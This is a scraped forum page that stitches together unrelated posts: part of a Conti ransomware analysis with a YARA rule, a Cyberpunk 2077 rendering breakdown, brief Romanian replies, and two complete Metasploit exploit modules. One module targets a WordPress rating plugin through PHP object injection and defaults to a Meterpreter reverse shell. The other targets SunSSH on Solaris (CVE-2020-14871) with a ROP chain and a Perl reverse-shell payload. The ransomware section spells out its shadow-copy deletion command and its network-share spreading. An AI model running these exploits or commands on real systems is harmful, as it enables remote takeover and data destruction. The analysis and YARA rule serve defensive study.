.vmrs, .vhdx, .avdx, .vmcx, .is The large file encrypting function processes the -size chunk mode argument and uses it in a switch statement to determine the encrypting offset and the encrypting size. According to Michael Gillespie, here are the chunk mode values: 0x14 (default) ==> represent 3 chunks of (file_size / 100 * 7) 0x32 ==> represent 5 chunks of (file_size / 100 * 10) The mechanism of encrypting can be simplify to this. Basically, Conti will encrypt encrypt_length amount of bytes and skip the next encrypt_offset before encrypting again until it reaches the end of the file. This makes encryption quicker for large files because it does not have to encrypt everything. Also according to Michael, Conti has a bug where the keystream sometime goes out of sync in-between chunks during encryption because the encrypted buffer size is rounded up to the nearest 64 which is the ChaCha state matrix size. Figure 27: Large File Encrypting mechanism 4. ChaCha8 Encryption The ChaCha8 implementation is pretty straightforward. The 256-byte key that was randomly generated earlier is then used as the encrypting key. Figure 28: Conti’s ChaCha8 implementation In order to be able to decrypt the files, we need to know the random key that Conti uses for each file, and the only way to retrieve it is through the encrypted key buffer at the end of the file. Since that buffer is encrypted with a public RSA key, we need the private RSA key to decrypt this. Nonetheless, since they are using a hard-coded public key, if anyone pays the ransom for this Conti version, the private key can be retrieved. It will be simple to write a decrypting tool if that is the case, and all of the samples with this ID will become useless after. This implementation clearly reflects how the Conti group mainly targets big companies instead of aiming to spread the malware to normal computer users. Once a company (or anyone) pays off the ransom, they have to discard all of the samples that use the private key and develop newer samples to spread. Figure 29: Conti’s Encryption method Delete Shadow Copy with COM Objects Before encrypting, Conti’s main thread calls CoInitializeEx, CoInitializeSecurity, and CoCreateInstance to creates a single object of the class IWbemLocator with the specified CLSID 4590F811-1D3A-11D0-891F-00AA004B2E24. Figure 30: Initializing COM Object Next, it checks if the processor architecture of the machine is x86-64 . If it is, then Conti will call CoCreateInstance to create a single object of the class IWbemContext with the specified CLSID 674B6698-EE92-11D0-AD71-00C04FD8FDFF. With this Call Context object, it can modify the __ProviderArchitecture to force load the specified provider version which is 64-bit architecture. Figure 31: Force load 64-bit if needed Using the IWbemLocator object earlier, Conti calls its ConnectServer method to connect with the local ROOT\CIMV2 namespace and obtain the pointer to an IWbemServices object. Figure 32: Connecting to ROOT\CIMV2 to get IWbemServices object With this IWbemServices object, it executes the SQL query “SELECT * FROM Win32_ShadowCopy” to retrieve a enumerator of all the shadow copies stored in the local server. By enumerating through these informations, Conti extracts the ID of each shadow copy, add that to the format string “cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where “ID=’%s’” delete”, and create a new process to execute. This will eventually deletes all the shadow copy storage areas in the computer. Figure 33: Building cmd string to delete shadowcopy based on ID Network Encryption For the network encryption, Conti calls CreateIoCompletionPort to spawn as many concurrently running threads as there are processors in the system, and these threads waits for a list of network shares to start encryption. Figure 34: CreateIoCompletionPort to spawn network encrypting thread The main thread then calls NetShareEnum to get an enumerator to extract information about shared network resources. This scans the system to see if there exists any existing SMB network shares. After getting this “ARP” cache, it will check if the IP addresses of hosts in the list start with “172.”, “192.168.”, “10.”, and “169.”. Since it only cares about encrypting local systems, any other IP address ranges is ignored. It will then scan and look for every shares with the name that is not “ADMIN$”, get the full path to the shares, and add it to an array of network shares. Figure 35: Scanning SMB for all existing SMB network shares After extracting this, it will loop through and call the function from Figure 15 to push these share names into the thread struct so the child threads can begin encrypting. If scanning SMB for network hosts fails, Conti will perform just a port scan using CreateIoCompletionPort GetQueuedCompletionStatus, and PostQueuedCompletionStatus Figure 36: Conti port scans After this point, the encryption happens the same as the local encryption, with share names being pushed into the shared thread struct for the child processes to encrypt. Key findings Overall, Conti ransomware is a sophisticated sample with many unique functionalities. By sacrificing the tremendous increase in size, the Conti team has implement a really troublesome string encryption method, which ended up taking me a while to go through and resolve all of the strings. The encryption scheme is a bit boring with a randomly generated key protected by a hard-coded public RSA key. However, the multi-threading encryption is implemented elegantly using a shared structure between all of the threads, which results in extreme encrypting speed. Conti also avoids encrypting large files entirely, so it’s obvious that the malware authors prioritize speed over encrypting quality. With its networking functionality, the ransomware actively looks for available shares on the network to spread its encryption. This mainly targets small business and enterprise fields that uses the SMB protocol for file sharing, as we have seen with Advantech, Riverside Community Care, Ixsight Technologies, Total Systems Services, … NOTE: For anyone who wants to analyze this sample further, you should set up a folder on your machine and runs the ransomware with the command line argument “-p [directory]” to test encryption on that directory only. It’s a pretty neat way to set up a small environment for testing and dynamic analysis that the authors have provided us with, so huge shoutout to them for that! YARA rule rule ContiV2 { meta: description = "YARA rule for Conti Ransomware v2" reference = "http://chuongdong.com/reverse%20engineering/2020/12/15/ContiRansomware/" author = "@cPeterr" date = "2020-12-15" rule_version = "v2" malware_type = "ransomware" malware_family = "Ransom:W32/Conti" tlp = "white" strings: $str1 = "polzarutu1982@protonmail.com" $str2 = "http://m232fdxbfmbrcehbrj5iayknxnggf6niqfj6x4iedrgtab4qupzjlaid.onion" $str3 = "expand 32-byte k" $string_decryption = { 8a 07 8d 7f 01 0f b6 c0 b9 ?? 00 00 00 2b c8 6b c1 ?? 99 f7 fe 8d 42 7f 99 f7 fe 88 57 ff } $compare_size = { ?? ?? 00 00 50 00 } condition: all of ($str*) and $string_decryption and $compare_size } References https://twitter.com/Arkbird_SOLG/status/1337565128561225728 https://twitter.com/VK_Intel/status/1297252264126685185 https://www.bleepingcomputer.com/news/security/conti-ransomware-shows-signs-of-being-ryuks-successor/ https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ https://id-ransomware.malwarehunterteam.com/identify.php?case=2c61281154a1c9df22081099c5c36503a63e9b01 https://twitter.com/demonslay335/status/1339975671817318400 Source
-
This Metasploit module affects WordPress Yet Another Stars Rating plugin versions prior to 1.8.7 and demonstrates a PHP object injection vulnerability. class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7', 'Description' => %q{ This module exploits Wordpress PHP Object Injection in Yet Another Stars Rating plugin < 1.8.7. The vulnerability is exploitable if there is the Wordpress site uses a 'yasr_visitor_votes' shortcode in a page (authenticated or not). This exploit uses the Requests_Utility_FilteredIterator as WP core class to exploit deserialization. The class allows to send an array and a callback in the constructur, and it will be called in every foreach loop. As the vulnerable module uses the unserialized cookie for a foreach loop, it is possible to exploit this behaviour to exploit the vulnerability. Wordpress disable deserialization for Requests_Utility_FilteredIterator in Wordpress >= 5.5.2, so the exploit only works for Wordpress versions < 5.5.2. Tested on: - Wordpress 5.4.1, - Yet Another Stars rating plugin = 1.8.6 - php 5.6 (in php7 you should customize the serialization payload to try the exploitation) }, 'Author' => [ 'Paul Dannewitz', # Vulnerability Discovery 'gx1 <g.per45[at]gmail.com>', # Exploit Developer ], 'Platform' => 'linux', 'Arch' => ARCH_PHP, 'Targets' => [['WordPress', {}]], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' }, 'CmdStagerFlavor' => ['curl', 'wget'], 'References' => [ ['URL', 'https://wpscan.com/vulnerability/9207'], ['URL', 'https://dannewitz.ninja/posts/php-unserialize-object-injection-yet-another-stars-rating-wordpress'], ['URL', 'https://www.cybersecurity-help.cz/vulnerabilities/17273/'], ['URL', 'https://cybersecsi.com/study-php-unserialize-object-injection-in-yet-another-stars-rating-plugin-by-using-docker-security-playground/'] # Exploit development explanation ], 'License' => MSF_LICENSE )) register_options([ OptString.new('PATH_CONTAINING_YASR_SHORTCODE', [true, 'The path containing yasr_visitor_votes shortcode', '/'] ), OptBool.new('REQUIRE_LOGIN', [true, 'If you need login to view tha path containing yasr shortcode', false] ), OptString.new('USERNAME', [false, 'The Wordpress username to authenticate with'] ), OptString.new('PASSWORD', [false, 'The Wordpress username to authenticate with'] ) ]) register_advanced_options([ OptString.new('WritableDir', [true, 'Writable directory to write temporary payload on disk.', '/tmp']) ]) end def yasr_path return datastore['PATH_CONTAINING_YASR_SHORTCODE'] end def cmdstager_path @cmdstager_path ||= "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha_lower(8)}" end def username return datastore['USERNAME'] end def password return datastore['PASSWORD'] end def require_login return datastore['REQUIRE_LOGIN'] end def check if not wordpress_and_online? print_error("#{target_uri} does not seem to be WordPress site") return end version = wordpress_version if not version.nil? print_status("#{target_uri} - WordPress Version #{version} detected") if version if Gem::Version.new(version) >= Gem::Version.new("5.5.2") print_bad("Version higher or equal to 5.5.2") return CheckCode::Safe end return check_plugin_version_from_readme('yet-another-stars-rating', '1.8.7') end return CheckCode::Unknown end def serialized_payload(p) return "C%3A33%3A%22Requests_Utility_FilteredIterator%22%3A#{p.length + 63 + p.length.digits.length }%3A%7Bx%3Ai%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A#{p.length}%3A%22#{URI.encode_www_form_component(p)}%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A6%3A%22system%22%3B%7D%7D" end def exploit fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online? if require_login print_status("Authentication required, try to login") cookie = wordpress_login(username, password) if cookie print_status("Login successed") else fail_with('Authentication failed', "Unable to login") end else # No login: empty cookie cookie = "" end print_status("Run exploit") print_status("Generating #{datastore['CMDSTAGER::FLAVOR']} command stager") @cmdstager = generate_cmdstager( temp: datastore['WritableDir'], file: File.basename(cmdstager_path) ).join(';') register_file_for_cleanup(cmdstager_path) sp = serialized_payload(@cmdstager) print_status("Send serialized payload: #{sp}") cookie = "#{cookie} yasr_visitor_vote_cookie=#{sp}" res = send_request_cgi({ 'method' => 'GET', 'uri' => yasr_path, 'cookie' => cookie}, 1) end end # 0day.today [2020-12-19] # Source
-
Introduction Two curses befall rendering engineers. First, we lose the ability to look at reality without being constantly reminded of how fascinatingly hard it is to solve light transport and model materials. Second, when you start playing any game, you cannot refrain from trying to reverse its rendering technology (which is particularly infuriating for multiplayer titles - stop shooting at me, I'm just here to look how rocks cast shadows!). So when I bought Cyberpunk 2077 I had to look at how it renders a frame. It's very simple to take RenderDoc captures of it, so I had really no excuse. The following are speculations on its rendering techniques, observations made while skimming captures, and playing a few hours. It's by no means a serious attempt at reverse engineering. For that, I lack both the time and the talent. I also rationalize doing a bad job at this by the following excuse: it's actually better this way. I think it's better to dream about how rendering (or anything really) could be, just with some degree of inspiration from external sources (in this case, RenderDoc captures), rather than exactly knowing what is going on. If we know, we know, there's no mystery anymore. It's what we do not know that makes us think, and sometimes we exactly guess what's going on, but other times we do one better, we hallucinate something new... Isn't that wonderful? The following is mostly a read-through of a single capture. I did open a second one to try to fill some blanks, but so far, that's all. I made the captures at high settings, without RTX or DLSS as RenderDoc does not allow these (yet?). I disabled motionblur and other uninteresting post-fx and made sure I was moving in all captures to be able to tell a bit better when passes access previous frame(s) data. I am also not relying on insider information for this. Makes everything easier and more fun. The basics At a glance, it doesn't take long to describe the core of Cyberpunk 2077 rendering. It's a classic deferred renderer, with a fairly vanilla g-buffer layout. We don't see the crazy amount of buffers of say, Suckerpunch's PS4 launch Infamous:Second Son, nor complex bit-packing and re-interpretation of channels. 10.10.10.2 Normals, with the 2-bit alpha reserved to mark hair 10.10.10.2 Albedo. Not clear what the alpha is doing here, it seems to just be set to one for everything drawn, but it might be only the captures I got 8.8.8.8 Metalness, Roughness, Translucency and Emissive, in this order (RGBA) Z-buffer and Stencil. The latter seems to isolate object/material types. Moving objects are tagged. Skin. Cars. Vegetation. Hair. Roads. Hard to tell / would take time to identify the meaning of each bit, but you get the gist... If we look at the frame chronologically, it starts with a bunch of UI draws (that I didn't investigate further), a bunch of copies from a CPU buffer into VS constants, then a shadowmap update (more on this later), and finally a depth pre-pass. This depth pre-pass is partial (not drawing the entire scene) and is only used to reduce the overdraw in the subsequent g-buffer pass. Basically, all the geometry draws are using instancing and some form of bindless textures. I'd imagine this was a big part of updating the engine from The Witcher 3 to contemporary hardware. Bindless also makes it quite annoying to look at the capture in renderDoc unfortunately - by spot-checking I could not see too many different shaders in the g-buffer pass - perhaps a sign of not having allowed artists to make shaders via visual graphs? Other wild guesses: I don't see any front-to-back sorting in the g-buffer, and the depth prepass renders all kinds of geometries, not just walls, so it would seem that there is no special authoring for these (brushes, forming a BSP) - nor artists have hand-tagged objects for the prepass, as some relatively "bad" occluders make the cut. I imagine that after culling a list of objects is sorted by shader and from there instanced draws are dynamically formed on the CPU. The opening credits do not mention Umbra (which was used in The Witcher 3) - so I guess CDPr rolled out their own visibility solution. Its effectiveness is really hard to gauge, as visibility is a GPU/CPU balance problem, but there seem to be quite a few draws that do not contribute to the image, for what's worth. It also looks like that at times the rendering can display "hidden" rooms, so it looks like it's not a cell and portal system - I am guessing that for such large worlds it's impractical to ask artists to do lots of manual work for visibility. Lastly, I didn't see any culling done GPU side, with depth pyramids and so on, no per-triangle or cluster culling or predicated draws, so I guess all frustum and occlusion culling is CPU-side. This pass includes avatars, and the shaders for these objects do not use bindless (perhaps that's used only for world geometry) - so it's much easier to see what's going on there if one wants to. Finally, we're done with the main g-buffer passes, depth-writes are turned off and there is a final pass for decals. Surprisingly these are pretty "vanilla" as well, most of them being mesh decals. Decals bind depth-stencil as input as well, hard to tell if to read the depth part, the stencil, or both, but as most decals are mesh-based, depth should not be needed, so let's guess stencil is what's used here... It looks like only triangles carrying decals are rendered, using special decal meshes, but other than that everything is remarkably simple. At the end of the decal pass we see sometimes projected decals as well, I haven't investigated dynamic ones created by weapons, but the static ones on the levels are just applied with tight boxes around geometry, I guess hand-made, without any stencil-marking technique (which would probably not help in this case) to try to minimize the shaded pixels. As for the main g-buffer draws, many of the decals might end up not contributing at all to the image, and I don't see much evidence of decal culling (as some tiny ones are draws) - but it also might depend on my chosen settings. The g-buffer pass is quite heavy, and the end results are fantastic. E.g. look at the normal, everything has patterns, and in general, the detail is quite high frequency. Lighting part 1: Analytic lights Obviously, no deferred rendering analysis can stop at the g-buffer, we split shading in two, and we have now to look at the second half, how lighting is done. Here things become a bit dicier, as in the modern age of compute shaders, everything gets packed into structures that we cannot easily see. Even textures can be hard to read when they do not carry continuous data but pack who-knows-what into integers. Regardless, it's pretty clear that after all the depth/g-buffer work is said and done, a uber-summarization pass kicks in taking care of a bunch of depth-related stuff. It first packs normal and roughness into a RGBA8 using Crytek's lookup-based best-fit normal encoding, then it creates a min-max mip pyramid of depth values. The pyramid is then used to create what looks like a volumetric texture for clustered lighting. So - from what I can see it looks like a clustered deferred lighting system. The clusters seem to be 32x32 pixels in screen-space (froxels), with 64 z-slices. The lighting though seems to be done at a 16x16 tile granularity, all via compute shader indirect dispatches. I would venture this is because CS are specialized by both the materials and lights present in a tile, and then dispatched accordingly - a common setup in contemporary deferred rendering systems (e.g. see Call of Duty Black Ops 3 and Uncharted 4 presentations on the topic). Analytic lighting pass outputs two RGBA16 buffers, which seems to be diffuse and specular contributions. Regarding the options for scene lights, I would not be surprised if all we have are spot/point/sphere lights and line/capsule lights. Most of Cyberpunk's lights are neons, so definitely line light support is a must. You'll also notice that a lot of the lighting is unshadowed, and I don't think I ever noticed multiple shadows under a single object/avatar. I'm sure that the engine does not have limitations in that aspect, but all this points at lighting that is heavily "authored" with artists carefully placing shadow-casting lights. I would also not be surprised if the lights have manually assigned bounding volumes to avoid leaks. Lighting part 2: Shadows But what we just saw does not mean that shadows are unsophisticated in Cyberpunk 2077, quite the contrary, there are definitely a number of tricks that have been employed, most of them not at all easy to reverse! First of all, before the depth-prepass, there are always a bunch of draws into what looks like a shadowmap. I suspect this is a CSM, but in the capture I have looked at, I have never seen it used, only rendered into. This points to a system that updates shadowmaps over many frames, likely with only static objects? These multi-frame effects are complicated to capture, so I can't say if there are further caching systems (e.g. see the quadtree compressed shadows of Black Ops 3) at play. One thing that looks interesting is that if you travel fast enough through a level (e.g. in a car) you can see that the shadows take some time to "catch up" and they fade in incrementally in a peculiar fashion. It almost appears like there is a depth offset applied from the sun point of view, that over time gets reduced. Interesting! Sun shadows are pre-resolved into a screen-space buffer prior to the lighting compute pass, I guess to simplify compute shaders and achieve higher occupancy. This buffer is generated in a pass that binds quite a few textures, two of which look CSM-ish. One is clearly a CSM, with in my case five entries in a texture array, where slices 0 to 3 are different cascades, but the last slice appears to be the same cascade as slice 0 but from a slightly different perspective. There's surely a lot to reverse-engineer here if one was inclined to do the work! All other shadows in the scene are some form of VSMs, computed again incrementally over time. I've seen 512x512 and 256x256 used, and in my captures, I can see five shadowmaps rendered per frame, but I'm guessing this depends on settings. Most of these seem only bound as render targets, so again it might be that it takes multiple frames to finish rendering them. One gets blurred (VSM) into a slice of a texture array - I've seen some with 10 slices and others with 20. Finally, we have what the game settings call "contact shadows" - which are screen-space, short-range raymarched shadows. These seem to be computed by the lighting compute shaders themselves, which would make sense as these know about lights and their directions... Overall, shadows are both simple and complex. The setup, with CSMs, VSMs, and optionally raymarching is not overly surprising, but I'm sure the devil is in the detail of how all these are generated and faded in. It's rare to see obvious artifacts, so the entire system has to be praised, especially in an open-world game! Lighting part III: All the rest... Since booting the game for the first time I had the distinct sense that most lighting is actually not in the form of analytic lights - and indeed looking at the captures this seems to not be unfounded. At the same time, there are no lightmaps, and I doubt there's anything pre-baked at all. This is perhaps one of the most fascinating parts of the rendering. First of all, there is a very good half-res SSAO pass. This is computed right after the uber-depth-summarization pass mentioned before, and it uses the packed RGBA8 normal-roughness instead of the g-buffer one. It looks like it's computing bent normals and aperture cones - impossible to tell the exact technique, but it's definitely doing a great job, probably something along the lines of HBAO-GTAO. First, depth, normal/roughness, and motion vectors are all downsampled to half-res. Then a pass computes current-frame AO, and subsequent ones do bilateral filtering and temporal reprojection. The dithering pattern is also quite regular if I had to guess, probably Jorge's Gradient noise? It's easy to guess that the separate diffuse-specular emitted from the lighting pass is there to make it easier to occlude both more correctly with the cone information. Second, we have to look at indirect lighting. After the light clustering pass there are a bunch of draws that update a texture array of what appear to be spherically (or dual paraboloid?) unwrapped probes. Again, this is distributed across frames, not all slices of this array are updated per frame. It's not hard to see in captures that some part of the probe array gets updated with new probes, generating on the fly mipmaps, presumably GGX-prefiltered. The source of the probe data is harder to find though, but in the main capture I'm using there seems to be something that looks like a specular cubemap relighting happening, it's not obvious to me if this is a different probe from the ones in the array or the source for the array data later on. Also, it's hard to say whether or not these probes are hand placed in the level, if the relighting assumption is true, then I'd imagine that the locations are fixed, and perhaps artist placed volumes or planes to define the influence area of each probe / avoid leaks. We have your "standard" volumetric lighting, computed in a 3d texture, with both temporal reprojection. The raymarching is clamped using the scene depth, presumably to save performance, but this, in turn, can lead to leaks and reprojection artifacts at times. Not too evident though in most cases. Now, things get very interesting again. First, we have an is an amazing Screen-Space Reflection pass, which again uses the packed normal/roughness buffer and thus supports blurry reflections, and at least at my rendering settings, is done at full resolution. It uses previous-frame color data, before UI compositing for the reflection (using motion vectors to reproject). And it's quite a lot of noise, even if it employs a blue-noise texture for dithering! Then, a indirect diffuse/ambient GI. Binds the g-buffer and a bunch of 64x64x64 volume textures that are hard to decode. From the inputs and outputs one can guess the volume is centered around the camera and contains indices to some sort of computed irradiance, maybe spherical harmonics or such. The lighting is very soft/low-frequency and indirect shadows are not really visible in this pass. This might even by dynamic GI! Certainly is volumetric, which has the advantage of being "uniform" across all objects, moving or not, and this coherence shows in the final game. And finally, everything gets composited together: specular probes, SSR, SSAO, diffuse GI, analytic lighting. This pass emits again two buffers, one which seems to be final lighting, and a second with what appears to be only the specular parts. And here is where we can see what I said at the beginning. Most lighting is not from analytic lights! We don't see the usual tricks of the trade, with a lot of "fill" lights added by artists (albeit the light design is definitely very careful), instead indirect lighting is what makes most of the scene. This indirect lighting is not as "precise" as engines that rely more heavily on GI bakes and complicated encodings, but it is very uniform and regains high-frequency effects via the two very high-quality screen-space passes, the AO and reflection ones. The screen-space passes are quite noisy, which in turn makes temporal reprojection really fundamental, and this is another extremely interesting aspect of this engine. Traditional wisdom says that reprojection does not work in games that have lots of transparent surfaces. The sci-fi worlds of Cyberpunk definitely qualify for this, but the engineers here did not get the news and made things work anyway! And yes, sometimes it's possible to see reprojection artifact, and the entire shading can have a bit of "swimming" in motion, but in general, it's solid and coherent, qualities that even many engines using lightmaps cannot claim to have. Light leaks are not common, silhouettes are usually well shaded, properly occluded. All the rest There are lots of other effects in the engine we won't cover - for brevity and to keep my sanity. Hair is very interesting, appearing to render multiple depth slices and inject itself partially in the g-buffer with some pre-lighting and weird normal (fake anisotropic?) effect. Translucency/skin shading is surely another important effect I won't dissect. Before the frame is over though, we have to mention transparencies - as more magic is going on here for sure. First, there is a pass that seems to compute a light chart, I think for all transparencies, not just particles. Glass can blur whatever is behind them, and this is done with a specialized pass, first rendering transparent geometry in a buffer that accumulates the blur amount, then a series of compute shaders end up creating three mips of the screen, and finally everything is composited back in the scene. After the "glass blur", transparencies are rendered again, together with particles, using the lighting information computed in the chart. At least at my rendering settings, everything here is done at full resolution. Finally, the all-mighty temporal reprojection. I would really like to see the game without this, the difference before and after the temporal reprojection is quite amazing. There is some sort of dilated mask magic going on, but to be honest, I can't see anything too bizarre going on, it's astonishing how well it works. Perhaps there are some very complicated secret recipes lurking somewhere in the shaders or beyond my ability to understand the capture. I wrote "finally" because I won't look further, i.e. the details of the post-effect stack, things here are not too surprising. Bloom is a big part of it, of course, almost adding another layer of indirect lighting, and it's top-notch as expected, stable, and wide. Depth of field, of course, tone-mapping and auto-exposure... There are of course all the image-degradation fixings you'd expect and probably want to disable: film grain, lens flares, motion blur, chromatic aberration... Even the UI compositing is non-trivial, all done in compute, but who has the time... Now that I got all this off my chest, I can finally try to go and enjoy the game! Bye! Source
-
This Metasploit module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::CheckModule include Msf::Exploit::Remote::SSH def initialize(info = {}) super( update_info( info, 'Name' => 'Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified. Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary. }, 'Author' => [ 'Jacob Thompson', # Analysis 'Aaron Carreras', # Analysis 'Jeffrey Martin', # Testing 'Hacker Fantastic', # PoC 'wvu' # Exploit ], 'References' => [ ['CVE', '2020-14871'], ['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html'], ['URL', 'https://hacker.house/lab/cve-2020-18471/'], ['URL', 'https://twitter.com/hackerfantastic/status/1323431512822435841'] ], 'DisclosureDate' => '2020-10-20', # Vendor advisory 'License' => MSF_LICENSE, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Payload' => { # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617 'BadChars' => "\x00\x09\x20", 'Encoder' => 'cmd/perl' }, 'Targets' => [ [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb90000 } ], [ 'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox', { 'Ident' => 'SSH-2.0-Sun_SSH_1.1.5', 'LibcBase' => 0xfeb80000 } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl', 'SSH_TIMEOUT' => 2, 'CheckModule' => 'auxiliary/scanner/ssh/ssh_version' }, 'Notes' => { 'Stability' => [CRASH_SERVICE_RESTARTS], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ACCOUNT_LOCKOUTS, IOC_IN_LOGS] } ) ) end def check # Run auxiliary/scanner/ssh/ssh_version checkcode = super return checkcode unless checkcode == CheckCode::Detected unless target['Ident'] == checkcode.details[:ident] return CheckCode::Safe("#{target.name} is an incompatible target.") end CheckCode::Appears("#{target.name} is a compatible target.") end def exploit print_status("Exploiting #{target.name}") ssh_client_opts = ssh_client_defaults.merge( port: rport, auth_methods: ['keyboard-interactive'], password: ret2libc, # HACK: This is really the username prompt on Solaris timeout: datastore['SSH_TIMEOUT'] ) ssh_client_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] print_status("Yeeting #{datastore['PAYLOAD']} at #{peer}") # Empty initial username Net::SSH.start(rhost, '', ssh_client_opts) rescue Net::SSH::AuthenticationFailed print_error(CheckCode::Safe.message) rescue Net::SSH::Disconnect print_warning('Disconnected, target selection may be incorrect!') rescue Net::SSH::ConnectionTimeout # Do nothing on success end # XXX: No ASLR, but libc base changes... def ret2libc buf = rand_text(516) buf << p32(target['LibcBase'] + 0x23904) # add esp, 8; ret buf << rand_text(4) buf << p32(0x08040101) # ecx buf << p32(0x0805ba07) # pop ecx; pop edx; pop ebp; ret buf << p32(target['LibcBase'] + 0x256d0) # exit(3) buf << p32(target['LibcBase'] + 0x91edf) # system(3) buf << rand_text(4) buf << p32(target['LibcBase'] + 0xae3f1) # push esp; and al, 0; push ecx; push edx; ret buf << payload.encoded end def p32(addr) [addr].pack('V') end end Source
- 1 reply
-
- 2
-
Vinzi licenta de adobe? (originala) unic proprietar?
-
http://gregfjohnson.com/rubik.html aproape am reusit
-
Incearca sa le oferi cat mai multe detalii: contactele din messenger, emai-urile primite/trimise pana in data cand ai uitat parola, ultimul log-in (zona/tara), anul cand ai creat contul, etc...